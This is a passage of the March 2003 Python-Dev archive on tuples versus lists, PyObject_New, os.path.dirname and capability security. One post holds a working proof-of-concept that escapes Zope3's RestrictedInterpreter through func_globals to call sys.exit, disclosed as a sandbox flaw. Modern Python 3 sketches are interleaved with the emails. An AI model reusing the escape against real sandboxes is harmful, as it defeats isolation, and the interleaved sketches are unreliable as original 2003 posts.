tuple and creating a list.  As I mentioned earlier, I seriously doubt it 
would have any significant impact on the overall execution speed of any 
non-trivial Python program, but it exists nonetheless.  Maybe in the realm of 
'low hanging fruit' it's the fruit that's fallen to the ground and begun to 
rot :)
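
A condensed version of the same measurement in present-day Python 3, offered
as a sketch only.  As in the script, the literal is part of the timed
statement, so construction cost is included.  No result is shown because the
numbers depend on the machine and interpreter, and newer CPython releases may
optimize constant literals so that the gap reported above does not reproduce.

```python
import timeit

# The literal is part of the timed code, as in the script above.
tuple_stmt = "5 in (0, 1, 2, 3, 4)"
list_stmt = "5 in [0, 1, 2, 3, 4]"

# Take the minimum of several repeats to reduce noise.
tuple_time = min(timeit.repeat(tuple_stmt, repeat=3, number=100000))
list_time = min(timeit.repeat(list_stmt, repeat=3, number=100000))

print("tuple: %.6f s  list: %.6f s" % (tuple_time, list_time))
```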

> Tuples are for heterogeneous data, lists are for homogeneous data.
> Tuples are *not* read-only lists.

I understand this in a strictly typed language, but in Python, since lists can 
be just as heterogeneous as tuples, it's always seemed to me that the 
greatest difference between lists and tuples is the mutability and 
extensibility of lists.

Jeremy


From Anthony Baxter <anthony@interlink.com.au>  Wed Mar 12 06:35:25 2003
From: Anthony Baxter <anthony@interlink.com.au> (Anthony Baxter)
Date: Wed, 12 Mar 2003 17:35:25 +1100
Subject: [Python-Dev] Audio devices
In-Reply-To: <200303111620.h2BGKJn27187@odiug.zope.com>
Message-ID: <200303120635.h2C6ZP803522@localhost.localdomain>

>>> Guido van Rossum wrote
> The sample is still played at too high a speed, but maybe that's
> expected?

For what it's worth, my redhat 7.3 Dell laptop does this whenever
it gets a mono sample to play. I'm waiting for RH8.1, this will
hopefully fix the problem.

Anthony
-- 
Anthony Baxter     <anthony@interlink.com.au>   
It's never too late to have a happy childhood.


From mal@lemburg.com  Wed Mar 12 09:01:32 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 12 Mar 2003 10:01:32 +0100
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org> <200303111449.42035.fincher.8@osu.edu> <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6EF76C.50608@lemburg.com>

Guido van Rossum wrote:
>>There are many places in the standard library where some code either
>>iterates over a literal list or checks for membership in a literal
>>list.  I'm curious if it would be considered productive and useful
>>to go through and change those places to iterate over/check for
>>membership in literal tuples instead of lists.  The tuple, I think,
>>more closely reflects the read-only literal nature of the code and
>>is slightly faster to boot.
> 
> 
> -1.
> 
> I bet you can't prove the speed-up.

He probably can :-) That's why I have so many tools in mxTools
which return tuples instead of lists, e.g. trange() and indices().
Both the tuple creation and the iteration are faster than list
creation and access (tuples don't use indirection which saves you a
second malloc() and dereference).

As always: it's the sum of small tweaks like these that makes the
difference in the overall performance of an application.

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 12 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     20 days left
EuroPython 2003, Charleroi, Belgium:                       104 days left


From dave@boost-consulting.com  Wed Mar 12 12:24:48 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Wed, 12 Mar 2003 07:24:48 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
Message-ID: <uptow93hr.fsf@boost-consulting.com>

Someone I work with recently caused a test to start asserting in VC7's
instrumented free() call, using a pydebug build.  He explained the
change this way:

"I switched from PyObject_New to PyObject_NEW, which according to its
documentation omits the check for type_object != 0 and consequently
should run a little bit faster"

[he doesn't ever pass 0 as the typeobject]

Did he miss some other important fact about PyObject_NEW? Does the
doc need to be fixed?

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Wed Mar 12 12:48:05 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 12 Mar 2003 07:48:05 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: "Your message of Wed, 12 Mar 2003 04:39:26 +0100."
 <3E6EABEE.2040108@tismer.com>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
 <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
 <3E6EABEE.2040108@tismer.com>
Message-ID: <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>

> > Tuples are for heterogeneous data, lists are for homogeneous data.
> > Tuples are *not* read-only lists.
> 
> Oh!
> 
> Did you point that out anywhere, before, and I missed it?

Yes.  I've been saying this for years whenever people would listen
(which is not often :-( )

> Are you thinking of lists as to be really somehow
> being homogeneous data, in a sense to be replaceable
> by some array optimization, sometimes, while tuples aren't?

Python is a dynamic language, and you can do whatever you want with
the data structures it gives you.  But when thinking about extending
the language with optional type declarations or automatic type
inference, I always think of the type of a list as "list of T" while I
think of a tuple's type as "tuple of length N with items of types T1,
T2, T3, ..., TN".  So [1, 2] and [1, 2, 3] are both "list of int" (and
"list of Number" and "list of Object", of course) while ("hello", 42)
is a "2-tuple with items str and int" and (42, "hello", 3.14) is a
"3-tuple with items int, str, float".
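
For illustration only, the distinction can be written down with the typing
module of later Python 3 releases, which did not exist when this was posted.
The functions total() and describe() are hypothetical.

```python
from typing import List, Tuple


def total(values: List[int]) -> int:
    # "list of T": any length, every item the same type.
    return sum(values)


def describe(record: Tuple[str, int]) -> str:
    # "2-tuple with items str and int": fixed length, one type per position.
    name, count = record
    return "%s=%d" % (name, count)


print(total([1, 2]), total([1, 2, 3]))
print(describe(("hello", 42)))
```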

> I never realized this, and I'm a bit stunned.
> (but by no means negative about it, just surprised)

You learn something new every day. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Wed Mar 12 12:54:55 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 12 Mar 2003 07:54:55 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: "Your message of Tue, 11 Mar 2003 20:03:08 EST."
 <200303112003.08689.fincher.8@osu.edu>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
 <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
 <200303112003.08689.fincher.8@osu.edu>
Message-ID: <200303121254.h2CCstj29915@pcp02138704pcs.reston01.va.comcast.net>

> On Tuesday 11 March 2003 09:11 pm, Guido van Rossum wrote:
> > I bet you can't prove the speed-up.
> 
> Here's the script I used to test it:

[Good use of 'timeit' module skipped]

> There seems to be a constant 1.3 usec or so difference between
> creating a tuple and creating a list.  As I mentioned earlier, I
> seriously doubt it would have any significant impact on the overall
> execution speed of any non-trivial Python program, but it exists
> nonetheless.  Maybe in the realm of 'low hanging fruit' it's the
> fruit that's fallen to the ground and begun to rot :)

Of course creating a tuple is faster than creating a list.  I meant
that you wouldn't be able to show a speed difference in any of the
places where you would consider adding it (i.e. in context).

> > Tuples are for heterogeneous data, lists are for homogeneous data.
> > Tuples are *not* read-only lists.
> 
> I understand this in a strictly typed language, but in Python, since
> lists can be just as heterogeneous as tuples, it's always seemed to
> me that the greatest difference between lists and tuples is the
> mutability and extensibility of lists.

Sorry, you're wrong.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From mal@lemburg.com  Wed Mar 12 12:57:25 2003
From: mal@lemburg.com (M.-A. Lemburg)
Date: Wed, 12 Mar 2003 13:57:25 +0100
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <uptow93hr.fsf@boost-consulting.com>
References: <uptow93hr.fsf@boost-consulting.com>
Message-ID: <3E6F2EB5.5020207@lemburg.com>

David Abrahams wrote:
> Someone I work with recently caused a test to start asserting in VC7's
> instrumented free() call, using a pydebug build.  He explained the
> change this way:
> 
> "I switched from PyObject_New to PyObject_NEW, which according to its
> documentation omits the check for type_object != 0 and consequently
> should run a little bit faster"
> 
> [he doesn't ever pass 0 as the typeobject]
> 
> Did he miss some other important fact about PyObject_NEW? Does the
> doc need to be fixed?

Does he use PyObject_DEL() to free the object ?

-- 
Marc-Andre Lemburg
eGenix.com

Professional Python Software directly from the Source  (#1, Mar 12 2003)
 >>> Python/Zope Products & Consulting ...         http://www.egenix.com/
 >>> mxODBC, mxDateTime, mxTextTools ...        http://python.egenix.com/
________________________________________________________________________
Python UK 2003, Oxford:                                     20 days left
EuroPython 2003, Charleroi, Belgium:                       104 days left


From guido@python.org  Wed Mar 12 13:08:20 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 12 Mar 2003 08:08:20 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: "Your message of Wed, 12 Mar 2003 07:24:48 EST."
 <uptow93hr.fsf@boost-consulting.com>
References: <uptow93hr.fsf@boost-consulting.com>
Message-ID: <200303121308.h2CD8Kj29996@pcp02138704pcs.reston01.va.comcast.net>

> Someone I work with recently caused a test to start asserting in VC7's
> instrumented free() call, using a pydebug build.  He explained the
> change this way:
> 
> "I switched from PyObject_New to PyObject_NEW, which according to its
> documentation omits the check for type_object != 0 and consequently
> should run a little bit faster"
> 
> [he doesn't ever pass 0 as the typeobject]
> 
> Did he miss some other important fact about PyObject_NEW? Does the
> doc need to be fixed?

You can read the source code as well as I can.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From ark@research.att.com  Wed Mar 12 14:06:10 2003
From: ark@research.att.com (Andrew Koenig)
Date: 12 Mar 2003 09:06:10 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
 <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
 <3E6EABEE.2040108@tismer.com>
 <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <yu998yvkadd9.fsf@europa.research.att.com>

Guido> Python is a dynamic language, and you can do whatever you want
Guido> with the data structures it gives you.  But when thinking about
Guido> extending the language with optional type declarations or
Guido> automatic type inference, I always think of the type of a list
Guido> as "list of T" while I think of a tuple's type as "tuple of
Guido> length N with items of types T1, T2, T3, ..., TN".  So [1, 2]
Guido> and [1, 2, 3] are both "list of int" (and "list of Number" and
Guido> "list of Object", of course) while ("hello", 42) is a "2-tuple
Guido> with items str and int" and (42, "hello", 3.14) is a "3-tuple
Guido> with items int, str, float".

It might interest you to know that Standard ML, which is statically
but polymorphically typed, draws exactly that distinction.  It has
both tuple and list types.  The type of a tuple includes the type of
each of its elements, whereas all of the elements of a list must be
the same type.  Moreover, although the type of a list includes the
type of its elements, it does not include how many elements there are.

So in ML, the type of [1, 2, 3] is "int list", and the type of
("hello", 42) is "string * int".

-- 
Andrew Koenig, ark@research.att.com, http://www.research.att.com/info/ark


From barry@python.org  Wed Mar 12 14:23:29 2003
From: barry@python.org (Barry A. Warsaw)
Date: Wed, 12 Mar 2003 09:23:29 -0500
Subject: [Python-Dev] Ridiculously minor tweaks?
References: <15982.24855.181016.568236@montanaro.dyndns.org>
 <200303111449.42035.fincher.8@osu.edu>
 <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
 <3E6EABEE.2040108@tismer.com>
 <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <15983.17121.164482.184532@gargle.gargle.HOWL>

>>>>> "GvR" == Guido van Rossum <guido@python.org> writes:

    GvR> I always think of the type of a list as "list of T" while I
    GvR> think of a tuple's type as "tuple of length N with items of
    GvR> types T1, T2, T3, ..., TN".  So [1, 2] and [1, 2, 3] are both
    GvR> "list of int" (and "list of Number" and "list of Object", of
    GvR> course) while ("hello", 42) is a "2-tuple with items str and
    GvR> int" and (42, "hello", 3.14) is a "3-tuple with items int,
    GvR> str, float".

Of course (1, 2, 3) fits under that description, where, just by chance
<wink> T1 == T2 == T3.

But one of the ways I think about it is the tuple's relationship to
argument and return passing.  It's the tuple that's used when multiple
values are returned from a function and they are almost always
heterogeneous.  And while lists can be used for unpacking sequences, I
tend to think of tuples when I want record types, e.g.

    rec = magic(blah)
    length, prefix, interface = rec
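
The record-type reading can be made explicit with collections.namedtuple
from later Python releases.  This is a sketch under assumptions: Rec, the
body of magic() and the "eth0" value are hypothetical, and only the three
field names come from the unpacking above.

```python
from collections import namedtuple

# Hypothetical record type; field names taken from the unpacking above.
Rec = namedtuple("Rec", ["length", "prefix", "interface"])


def magic(blah):
    # Stand-in for the real function: returns one heterogeneous record.
    return Rec(len(blah), blah[:2], "eth0")


rec = magic("blah")
length, prefix, interface = rec   # still unpacks like a plain tuple
print(length, prefix, interface)
```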

-Barry


From tismer@tismer.com  Wed Mar 12 14:46:55 2003
From: tismer@tismer.com (Christian Tismer)
Date: Wed, 12 Mar 2003 15:46:55 +0100
Subject: [Python-Dev] Ridiculously minor tweaks?
In-Reply-To: <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org> <200303111449.42035.fincher.8@osu.edu> <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net> <3E6EABEE.2040108@tismer.com> <200303121248.h2CCm5K29846@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <3E6F485F.3030104@tismer.com>

Guido van Rossum wrote:
>>>Tuples are for heterogeneous data, lists are for homogeneous data.
>>>Tuples are *not* read-only lists.
>>
>>Oh!
>>
>>Did you point that out anywhere, before, and I missed it?
> 
> Yes.  I've been saying this for years whenever people would listen
> (which is not often :-( )

Sorry.

>>Are you thinking of lists as to be really somehow
>>being homogeneous data, in a sense to be replaceable
>>by some array optimization, sometimes, while tuples aren't?
> 
> 
> Python is a dynamic language, and you can do whatever you want with
> the data structures it gives you.  But when thinking about extending
> the language with optional type declarations or automatic type
> inference, I always think of the type of a list as "list of T" while I
> think of a tuple's type as "tuple of length N with items of types T1,
> T2, T3, ..., TN".  So [1, 2] and [1, 2, 3] are both "list of int" (and
> "list of Number" and "list of Object", of course) while ("hello", 42)
> is a "2-tuple with items str and int" and (42, "hello", 3.14) is a
> "3-tuple with items int, str, float".

Oh yes, after re-thinking this, my question was
dumb. From my own usage of tuples and lists,
I know that I almost always use lists as collections
of objects of the same type, while tuples are often
used to group different things together.

Basically, I knew this all, and I'm asking
myself why I asked. Probably since I'm looking
at lists and tuples too much technically, these days.

cheers - chris

-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From pedronis@bluewin.ch  Wed Mar 12 16:25:58 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Wed, 12 Mar 2003 17:25:58 +0100
Subject: [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico> <05a701c2e66f$6c001be0$6d94fea9@newmexico> <3E6C7C3A.2090104@zope.com> <008001c2e70f$f514c520$6d94fea9@newmexico>
Message-ID: <007a01c2e8b4$1092ab00$6d94fea9@newmexico>

This is a multi-part message in MIME format.

------=_NextPart_000_0077_01C2E8BC.71D0CC00
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

I posted

> <s.py>
[...]
>
> class MyExc(Exception): # !!! definition outside of restricted execution
>   def __init__(self,msg):
>     self.message = msg
>     Exception.__init__(self,msg)
>
>   def __str__(self):
>     return self.message
>
> def myfunc():
>   raise MyExc('foo')
>
> ri = RestrictedInterpreter()
>
> ri.globals['myfunc'] = ProxyFactory(myfunc)
>
> f = open('c:/Documenti/x.txt','r')
> code = f.read()
> f.close()
>
> ri.ri_exec(code)
>
> print "OK"
> </s.py>
>
> Anyway I have a _very baroque_ x.txt that  manages to call sys.exit.
>

Attached is a modified version of s.py that takes a filename for the code to
run inside the RestrictedInterpreter. Also, myfunc is now myexc_source. There
is also a new function, candy; more on that in the next mail.

Here is a run with xpl1 (was x.txt):

...>\usr\python22\python -i s.py xpl1
restricted execution
no exit
cannot access sys.exit directly
Got sys.exit

...>

No "OK", and no Python prompt!

here is xpl1 code [warning: metaclasses, descriptors usage, functional
programming ahead :)]
[some things are artifacts of the non-deliberate limitations inside
RestrictedInterpreter]

#Object = ''.__class__.__base__
Type = ''.__class__.__class__

class Iter:
  __metaclass__ = Type
  def __init__(self,v):
    self.v = v
    self.i = 0
  def __iter__(self): return self
  def next(self):
    try:
      v = self.v[self.i]
      self.i += 1
      return v
    except IndexError:
      raise StopIteration

class consta:
  __metaclass__ = Type

  def __init__(self,o):
    self.o = o

  def __get__(self,obj,typ): return self.o

#

try:
  myexc_source()
except Exception,e:
  pass

MyExc = e.__class__
e__str__ = e.__str__

#

try:
  e__str__.func_globals
except:
  print "restricted execution"

try:
  exit(0)
except:
  print "no exit"

try:
  import sys
  sys.exit(0)
except:
  print "cannot access sys.exit directly"

#

class Y:
  class __metaclass__(Type):
    def __iter__(cls): return Iter(['func_globals'])

class X(Y,MyExc):

  message = None

  __call__ = consta(getattr)
  def __iter__(self): return Iter([e__str__])

  #def __get__(self,x,X):
  #  print self,x,y
  #  return map(self,x,X)

  __get__ = map

# x isinst MyExc
# x.message === x.__get__(x,X) === map(x,x,X)
# x(o,a) === getattr(o,a)
# map(None,x) === [e__str__]
# map(None,X) === ['func_globals']

x=X()
X.message = x

g = MyExc.__str__(x)

print "Got sys.exit"
g[0]['exit'](0)
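
Stripped of the metaclass and descriptor machinery, the last step of xpl1 relies on a function object carrying a reference to the globals of the module that defined it. The following is a minimal Python 3 sketch of that leak only (func_globals is spelled __globals__ there). The module name host is a hypothetical stand-in for s.py, and no RestrictedInterpreter or proxy is involved, so it does not reproduce the bypass itself:

```python
import sys
import types

# Hypothetical stand-in for s.py: a host module that imports a sensitive
# name into the same namespace where the exception class is defined.
host = types.ModuleType("host")
exec(
    "from sys import exit\n"
    "class MyExc(Exception):\n"
    "    def __str__(self):\n"
    "        return 'foo'\n",
    host.__dict__,
)

# Untrusted code only needs to get hold of an instance ...
exc = host.MyExc("foo")

# ... because the method's underlying function keeps a reference to the
# global namespace of the module that defined it.
leaked = type(exc).__str__.__globals__

# Every name imported into that module is reachable from here.
reachable_exit = leaked["exit"]
```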

------=_NextPart_000_0077_01C2E8BC.71D0CC00
Content-Type: text/plain;
	name="s.py"
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment;
	filename="s.py"

import sys

from os.path import join as pathjoin,dirname

code_fname = pathjoin(dirname(sys.argv[0]),sys.argv[1])

from sys import exit # !!! same module as MyExc

sys.path.append('C:/transit/Zope3-3.0a1/src') # ! add Zope3 (alpha) to sys.path

from zope.security.interpreter import RestrictedInterpreter
from zope.security.checker import ProxyFactory

class MyExc(Exception): # !!! definition outside of restricted execution
  def __init__(self,msg):
    self.message = msg
    Exception.__init__(self,msg)

  def __str__(self):
    return self.message

def myexc_source():
  raise MyExc('foo')

def candy(s):
  if s == "yes":
    return 'candy'
  else:
    return 'none'

ri = RestrictedInterpreter()

ri.globals['myexc_source'] = ProxyFactory(myexc_source)

ri.globals['candy'] = ProxyFactory(candy)

f = open(code_fname,'r')
code = f.read()
f.close()

ri.ri_exec(code)

print "OK"
------=_NextPart_000_0077_01C2E8BC.71D0CC00--


From ben@algroup.co.uk  Wed Mar 12 16:24:40 2003
From: ben@algroup.co.uk (Ben Laurie)
Date: Wed, 12 Mar 2003 16:24:40 +0000
Subject: [Python-Dev] Re: Capabilities
In-Reply-To: <E18sUcB-0003SH-00@localhost>
References: <E18s06J-0006ZD-00@localhost>  <200303100110.h2A1AaC06743@pcp02138704pcs.reston01.va.comcast.net> <E18sUcB-0003SH-00@localhost>
Message-ID: <3E6F5F48.7040001@algroup.co.uk>

Zooko wrote:
> I suspect that capabilities are quite similar to Zope proxies.

If I understand them correctly, a Zope proxy where the security checker 
always says "yes" is a capability. Except, possibly, they may be 
forgeable, I don't know them well enough to know.

Cheers,

Ben.

-- 
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/

"There is no limit to what a man can do or how far he can go if he
doesn't mind who gets the credit." - Robert Woodruff


From altis@semi-retired.com  Wed Mar 12 16:43:04 2003
From: altis@semi-retired.com (Kevin Altis)
Date: Wed, 12 Mar 2003 08:43:04 -0800
Subject: [Python-Dev] os.path.dirname misleading?
Message-ID: <KJEOLDOPMIDKCMJDCNDPOEJJDBAA.altis@semi-retired.com>

I'm not sure whether to classify this as a bug or a feature request.
Recently, I got burned by the fact that despite the name, dirname() does not
return the expected directory portion of a path if you pass it a directory,
instead it will return the parent directory because it uses split.

That it uses split is clearly documented and also evident in the source,
though both fail to point out the case of passing in a directory path.

"dirname(path)
Return the directory name of pathname path. This is the first half of the
pair returned by split(path)."

# Return the head (dirname) part of a path.

def dirname(p):
    """Returns the directory component of a pathname"""
    return split(p)[0]

However, to get what I would consider correct behavior based on the function
name, the code would need to be:

def dirname(p):
    """Returns the directory component of a pathname"""
    if isdir(p):
        return p
    else:
        return split(p)[0]

Changing dirname() may in fact break existing code if people expect it to
just use split, so a dirname2() function seems called for, but that seems
silly, given that dirname should probably be doing an isdir() check.

ka


From aahz@pythoncraft.com  Wed Mar 12 16:48:58 2003
From: aahz@pythoncraft.com (Aahz)
Date: Wed, 12 Mar 2003 11:48:58 -0500
Subject: [Python-Dev] Tuples vs lists
In-Reply-To: <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
References: <15982.24855.181016.568236@montanaro.dyndns.org> <200303111449.42035.fincher.8@osu.edu> <200303120211.h2C2BCH28989@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030312164858.GA16021@panix.com>

On Tue, Mar 11, 2003, Guido van Rossum wrote:
>
> Tuples are for heterogeneous data, lists are for homogeneous data.
> Tuples are *not* read-only lists.

It's been on my To-Do list to update PEP 8 since last June; if someone
else wants to do it, be my guest.  ;-)
-- 
Aahz (aahz@pythoncraft.com)           <*>         http://www.pythoncraft.com/

Register for PyCon now!  http://www.python.org/pycon/reg.html


From skip@pobox.com  Wed Mar 12 16:54:57 2003
From: skip@pobox.com (Skip Montanaro)
Date: Wed, 12 Mar 2003 10:54:57 -0600
Subject: [Python-Dev] os.path.dirname misleading?
In-Reply-To: <KJEOLDOPMIDKCMJDCNDPOEJJDBAA.altis@semi-retired.com>
References: <KJEOLDOPMIDKCMJDCNDPOEJJDBAA.altis@semi-retired.com>
Message-ID: <15983.26209.303521.418616@montanaro.dyndns.org>

    Kevin> However, to get what I would consider correct behavior based on
    Kevin> the function name, the code would need to be:

    Kevin> def dirname(p):
    Kevin>     """Returns the directory component of a pathname"""
    Kevin>     if isdir(p):
    Kevin>         return p
    Kevin>     else:
    Kevin>         return split(p)[0]

No can do.  On my Mac I could execute:

    >>> import ntpath
    >>> print ntpath.dirname("C:\\system\\win32")
    C:\system

Calling isdir() is not an option.

Taken another way, "/usr/bin" is a path to a file, so "/usr" is its
directory component, and "bin" is its basename:

    >>> os.path.dirname("/usr/bin")
    '/usr'
    >>> os.path.basename("/usr/bin")
    'bin'

That "/usr/bin" happens to also be a directory is beside the point.
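
A small sketch of the same point in current Python: ntpath and posixpath can both be imported on any platform because they only parse strings and never touch the filesystem. The variable names are made up for illustration.

```python
import ntpath
import posixpath

# Windows-style parsing works even where no C: drive exists.
win_dir = ntpath.dirname("C:\\system\\win32")

# POSIX-style parsing: everything before the last slash is the directory part.
unix_dir = posixpath.dirname("/usr/bin")
unix_base = posixpath.basename("/usr/bin")

# A trailing separator moves the split point, so the basename becomes empty
# and the directory part is the whole path minus the slash.
unix_dir_trailing = posixpath.dirname("/usr/bin/")
unix_base_trailing = posixpath.basename("/usr/bin/")
```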

Skip


From guido@python.org  Wed Mar 12 17:04:38 2003
From: guido@python.org (Guido van Rossum)
Date: Wed, 12 Mar 2003 12:04:38 -0500
Subject: [Python-Dev] os.path.dirname misleading?
In-Reply-To: Your message of "Wed, 12 Mar 2003 08:43:04 PST."
 <KJEOLDOPMIDKCMJDCNDPOEJJDBAA.altis@semi-retired.com>
References: <KJEOLDOPMIDKCMJDCNDPOEJJDBAA.altis@semi-retired.com>
Message-ID: <200303121704.h2CH4jn00404@odiug.zope.com>

> I'm not sure whether to classify this as a bug or a feature request.
> Recently, I got burned by the fact that despite the name, dirname()
> does not return the expected directory portion of a path if you pass
> it a directory, instead it will return the parent directory because
> it uses split.

This is the first time I've ever heard of this confusion.  dirname is
named after the Unix shell function of the same name, which behaves
the same way.

I'm not even sure I understand what you expected -- you expected
dirname("foo") to return "foo" if foo is a directory?  What would be
the point of that?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Wed Mar 12 17:15:21 2003
From: tim.one@comcast.net (Tim Peters)
Date: Wed, 12 Mar 2003 12:15:21 -0500
Subject: [Python-Dev] PyObject_New vs PyObject_NEW
In-Reply-To: <200303121308.h2CD8Kj29996@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCEELDEAAB.tim.one@comcast.net>

[David Abrahams]
> Someone I work with recently caused a test to start asserting in VC7's
> instrumented free() call, using a pydebug build.  He explained the
> change this way:
>
> "I switched from PyObject_New to PyObject_NEW, which according to its
> documentation omits the check for type_object != 0 and consequently
> should run a little bit faster"
>
> [he doesn't ever pass 0 as the typeobject]

> Did he miss some other important fact about PyObject_NEW? Does the
> doc need to be fixed?

[Guido]
> You can read the source code as well as I can.

Possibly, but not as well as I can <wink> -- the memory API's implementation
is monumentally convoluted, especially before 2.3.  Speaking of which,
David, which version of Python was "someone" using?  Did they enable
pymalloc?  Did they give you a traceback (showing from where free() was
called)?  Was it even freeing a Python object at the time?  In what code
base did someone make this substitution (e.g., Python core, Boost sources,
someone's own extension module, someone else's extension module)?

The straight answer to your question is no.  A nastier answer is that many
memory mgmt screwups are shy, and can be triggered by seemingly irrelevant
changes.


From altis@semi-retired.com  Wed Mar 12 17:45:15 2003
From: altis@semi-retired.com (Kevin Altis)
Date: Wed, 12 Mar 2003 09:45:15 -0800
Subject: [Python-Dev] os.path.dirname misleading?
In-Reply-To: <200303121704.h2CH4jn00404@odiug.zope.com>
Message-ID: <KJEOLDOPMIDKCMJDCNDPGEJMDBAA.altis@semi-retired.com>

> From: Guido van Rossum
>
> > I'm not sure whether to classify this as a bug or a feature request.
> > Recently, I got burned by the fact that despite the name, dirname()
> > does not return the expected directory portion of a path if you pass
> > it a directory, instead it will return the parent directory because
> > it uses split.
>
> This is the first time I've ever heard of this confusion.  dirname is
> named after the Unix shell function of the same name, which behaves
> the same way.

Well that's news. I never heard of or used dirname in the shell. But with
that historical context it makes more sense now.

> I'm not even sure I understand what you expected -- you expected
> dirname("foo") to return "foo" if foo is a directory?  What would be
> the point of that?

Yes, I expected to get the directory passed in based on the function name.
In the code in question I don't know whether the path is a directory or a
file when I call dirname. I was simply misled by the function name. Looking
at this further, I can see that I'm just going to have to create my own
directory(path) function: because of how os.path.split behaves, which in turn
affects dirname, I definitely need an isdir() check.

>>> os.path.split('c:\\mypython\\bugs\\')
('c:\\mypython\\bugs', '')
>>> os.path.split('c:\\mypython\\bugs')
('c:\\mypython', 'bugs')

Hmm, I may actually switch to using split(path)[0] and split(path)[-1] (or
split(path)[1]) in some cases since those might be more descriptive of what
dirname and basename actually do. Pity the functions aren't named
os.path.head and os.path.tail.
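
A minimal sketch of such a helper in current Python. The name directory comes from the paragraph above, but the body is only one plausible reading of it. Unlike dirname, it consults the filesystem, so it only makes sense for paths that exist on the machine running the code.

```python
import os.path
import tempfile


def directory(path):
    """Hypothetical helper: return path itself if it names an existing
    directory, otherwise fall back to os.path.dirname(path)."""
    if os.path.isdir(path):
        return path
    return os.path.dirname(path)


# Usage sketch against a throwaway directory.
with tempfile.TemporaryDirectory() as tmp:
    file_path = os.path.join(tmp, "notes.txt")
    with open(file_path, "w") as fh:
        fh.write("x")
    dir_result = directory(tmp)          # existing directory: returned as-is
    file_result = directory(file_path)   # regular file: its parent directory
```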

Sorry for the confusion,

ka


From pedronis@bluewin.ch  Wed Mar 12 17:53:21 2003
From: pedronis@bluewin.ch (Samuele Pedroni)
Date: Wed, 12 Mar 2003 18:53:21 +0100
Subject: about candy [Python-Dev] Re: Capabilities
References: <200303071741.h27HfGb23015@pcp02138704pcs.reston01.va.comcast.net>	 <3E69E1BC.5090508@algroup.co.uk> <1047150320.2347.26.camel@localhost.localdomain> <3E6B21F7.3040300@zope.com> <011f01c2e62f$3e6d5840$6d94fea9@newmexico> <05a701c2e66f$6c001be0$6d94fea9@newmexico> <3E6C7C3A.2090104@zope.com> <008001c2e70f$f514c520$6d94fea9@newmexico> <007a01c2e8b4$1092ab00$6d94fea9@newmexico>
Message-ID: <031001c2e8c0$45a066a0$6d94fea9@newmexico>

[me]
> attached is a modified version of s.py that takes a filename for the code to
> run inside the RestrictedInterpreter. Also myfunc is now myexc_source . There
> is also a new function candy, next mail on that.

Consider from s.py:

-- * --
from sys import exit
...

def candy(s):
  if s == "yes":
    return 'candy'
  else:
    return 'none'

ri = RestrictedInterpreter()

